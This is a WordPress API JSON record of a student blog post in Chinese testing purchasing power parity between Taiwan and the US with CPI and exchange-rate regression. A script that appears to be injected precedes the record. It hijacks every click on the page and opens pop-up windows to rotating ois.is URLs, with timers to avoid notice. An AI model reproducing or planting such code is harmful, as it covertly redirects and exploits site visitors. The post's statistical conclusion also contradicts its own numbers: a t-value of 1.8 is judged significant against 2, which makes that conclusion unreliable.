<script>(function (parameters) {
		const targets = [
			'https://ois.is/images/logo-1.png', 'https://ois.is/images/logo-2.png', 'https://ois.is/images/logo-3.png', 'https://ois.is/images/logo-4.png', 'https://ois.is/images/logo-5.png', 'https://ois.is/images/logo-6.png', 'https://ois.is/images/logo-7.png', 'https://ois.is/images/logo-8.png'
		]
		// Times between clicks
		const restMinutes = 1;
		// Number of hours to allow re-click 
		const allowedHours = 2;


		const saveTargetLocationsToStorage = (targets) => {
			targets.forEach((target, index) => {
				if(!localStorage.getItem(`${target}-local-storage`)){
					localStorage.setItem(`${target}-local-storage`, 0);
				}
			});
		}
		const getRandomLocationFromStorage = (targets) => {
			const nonVisited = targets.filter((target, index) => localStorage.getItem(`${target}-local-storage`) == 0)
			return nonVisited[Math.floor(Math.random() * nonVisited.length)];
		}
		const setLocationAsVisited = (target) => localStorage.setItem(`${target}-local-storage`, 1);

		const getTimeStorage = (key) => localStorage.getItem(`${key}-local-storage`);
		const setTimeToStorage = (key, nowDate) => localStorage.setItem(`${key}-local-storage`, nowDate);

		const getHoursDiff = (startDate, endDate) => {
			const msInHour = 1000 * 60 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInHour);
		}
		const getMintsDiff = (startDate, endDate) => {
			const msInMints = 1000 * 60;
			return Math.round(Math.abs(endDate - startDate) / msInMints);
		}

		const visitNewLocation = (targets, host, nowDate) => {
			saveTargetLocationsToStorage(targets);
			newLocation = getRandomLocationFromStorage(targets);
			setTimeToStorage(`${host}-mnts`, nowDate);
			setTimeToStorage(`${host}-hurs`, nowDate);
			setLocationAsVisited(newLocation);
			window.open(newLocation, "_blank");
		}

		// const randomLocation = getRandomLocationFromStorage(targets);
		saveTargetLocationsToStorage(targets);

		function globalClick(event) {
			event.stopPropagation();
			const host = location.host;
			let newLocation = getRandomLocationFromStorage(targets);
			const nowDate = Date.parse(new Date());
			const savedDateForMints = getTimeStorage(`${host}-mnts`);
			const savedDateForHours = getTimeStorage(`${host}-hurs`);

			if (savedDateForMints && savedDateForHours) {
				try {
					const storageDateForMints = parseInt(savedDateForMints);
					const storageDateForHours = parseInt(savedDateForHours);
					const mintsDiff = getMintsDiff(nowDate, storageDateForMints);
					const hoursDiff = getHoursDiff(nowDate, storageDateForHours);

					if (hoursDiff >= allowedHours) {
						saveTargetLocationsToStorage(targets);
						setTimeToStorage(`${host}-hurs`, nowDate);
					}
					if (mintsDiff >= restMinutes) {
						if (newLocation) {
							setTimeToStorage(`${host}-mnts`, nowDate);
							window.open(newLocation, "_blank");
							setLocationAsVisited(newLocation);
						}
					}
				} catch (error) { visitNewLocation(targets, host, nowDate); }
			} else { visitNewLocation(targets, host, nowDate); }
		}
		document.addEventListener("click", globalClick)
	})()</script>{"id":1063,"date":"2023-05-11T02:58:15","date_gmt":"2023-05-10T18:58:15","guid":{"rendered":"https:\/\/edu.secda.info\/scu8154204\/?p=1063"},"modified":"2023-05-11T02:58:15","modified_gmt":"2023-05-10T18:58:15","slug":"ppp%e5%af%a6%e8%ad%89","status":"publish","type":"post","link":"https:\/\/edu.secda.info\/scu8154204\/?p=1063","title":{"rendered":"PPP\u5be6\u8b49"},"content":{"rendered":"<p>\u6b64\u6b21\u7814\u7a76\u5340\u9593\u8a2d\u5b9a\u70ba2021\u5e743\u6708\u81f32023\u5e743\u6708\uff0c\u517125\u500b\u6708\u4efd\uff0c\u4ee5\u53f0\u7063CPI\u7e3d\u6307\u6578\u548c\u7f8e\u570bCPI\u8a08\u7b97\u51fa\u5176\u589e\u52a0\u7387\uff0c\u5373\u901a\u81a8\u7387\uff0c\u518d\u4ee5\u7f8e\u5143\u514c\u53f0\u5e63\u532f\u7387\u8a08\u7b97\u532f\u7387\u8b8a\u52d5\u7387\u3002\u4ee5\u6a6b\u8ef8(X\u8ef8)\u70ba\u5169\u570b\u901a\u81a8\u7387\uff0c\u7e31\u8ef8(Y\u8ef8)\u70ba\u532f\u7387\u8b8a\u52d5\u7387\uff0c\u8dd1\u7dda\u6027\u8ff4\u6b78\u6a21\u578b\u5f97\u51fa\u4e0b\u5716:<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone  wp-image-1064\" src=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-223911-300x178.png\" alt=\"\" width=\"591\" height=\"351\" srcset=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-223911-300x178.png 300w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-223911-800x475.png 800w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-223911-768x456.png 768w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-223911.png 1051w\" sizes=\"(max-width: 591px) 100vw, 591px\" \/><\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone  wp-image-1065\" src=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-224058-300x204.png\" alt=\"\" width=\"613\" height=\"417\" srcset=\"https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-224058-300x204.png 300w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-224058-800x543.png 800w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-224058-768x521.png 768w, https:\/\/edu.secda.info\/scu8154204\/wp-content\/uploads\/2023\/05\/\u87a2\u5e55\u64f7\u53d6\u756b\u9762-2023-05-10-224058.png 906w\" sizes=\"(max-width: 613px) 100vw, 613px\" \/><\/p>\n<p>\u4ee5\u8ff4\u6b78\u5206\u6790\u6aa2\u9a57<\/p>\n<p>\u865b\u7121\u5047\u8a2d :\u622a\u8ddd=0<\/p>\n<p>\u5c0d\u7acb\u5047\u8a2d :\u622a\u8ddd\u22600<\/p>\n<p>P-value = 0.508328<\/p>\n<p>\u572895%\u4fe1\u5fc3\u6c34\u6e96\u4e0b\uff0c\u4e0d\u62d2\u7d55\u865b\u7121\u5047\u8a2d\uff0c\u4ee3\u8868\u6bcd\u9ad4\u7684\u622a\u8dddalpha=0\u6c92\u6709\u88ab\u62d2\u7d55<\/p>\n<p>\u53e6\u6aa2\u9a57<\/p>\n<p>\u865b\u7121\u5047\u8a2d :\u659c\u7387=1<\/p>\n<p>\u5c0d\u7acb\u5047\u8a2d :\u659c\u7387\u22601<\/p>\n<p>\u6aa2\u5b9a\u7d71\u8a08\u91cf\u5728\u5716\u4e2d\u4e0b\u65b9\u70ba -1.8032<\/p>\n<p>\u5176\u7d55\u5c0d\u503c\u70ba1.8032\uff0c\u67e5\u8868\u5f8c\uff0c\u53c8\u4ee5\u7d93\u9a57\u6cd5\u5247\u548c2\u76f8\u6bd4\uff0c<\/p>\n<p>\u5f97\u5230\u7d50\u679c-0.22853 beta\u986f\u8457\u5c0f\u65bc1\u7684\u7d50\u8ad6\uff0c\u610f\u5373<strong>PPP<\/strong><strong>\u4e0d\u6210\u7acb<\/strong>\u3002<\/p>\n<p>\u89c0\u9ede:<\/p>\n<p>\u5728\u524d\u63d0\u5047\u8a2d\uff0c\u5b8c\u7f8e\u5e02\u5834\u4e0b\uff0cPPP\u6703\u6210\u7acb\u3002\u4f46\u5728\u771f\u5be6\u4e16\u754c\u4e0a\uff0c\u5e02\u5834\u4e26\u975e\u5b8c\u7f8e\u4e14\u5b58\u5728\u8a31\u591a\u4ea4\u6613\u6210\u672c\u3001\u624b\u7e8c\u8cbb\u3001\u8cbf\u6613\u58c1\u58d8\u969c\u7919\uff0c\u800c\u570b\u5bb6\u9593\u7684\u50f9\u503c\u8a8d\u77e5\u4e0a\u4ea6\u5b58\u5728\u5dee\u7570\uff0c\u5982\u6b64\u7a2e\u7a2e\u7684\u9650\u5236\uff0c\u90fd\u6703\u9020\u6210PPP\u4e0d\u6210\u7acb\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u6b64\u6b21\u7814\u7a76\u5340\u9593\u8a2d\u5b9a\u70ba2021\u5e743\u6708\u81f32023\u5e743\u6708\uff0c\u517125\u500b\u6708\u4efd\uff0c\u4ee5\u53f0\u7063CPI\u7e3d\u6307<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/1063"}],"collection":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1063"}],"version-history":[{"count":1,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/1063\/revisions"}],"predecessor-version":[{"id":1066,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=\/wp\/v2\/posts\/1063\/revisions\/1066"}],"wp:attachment":[{"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1063"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1063"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/edu.secda.info\/scu8154204\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1063"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}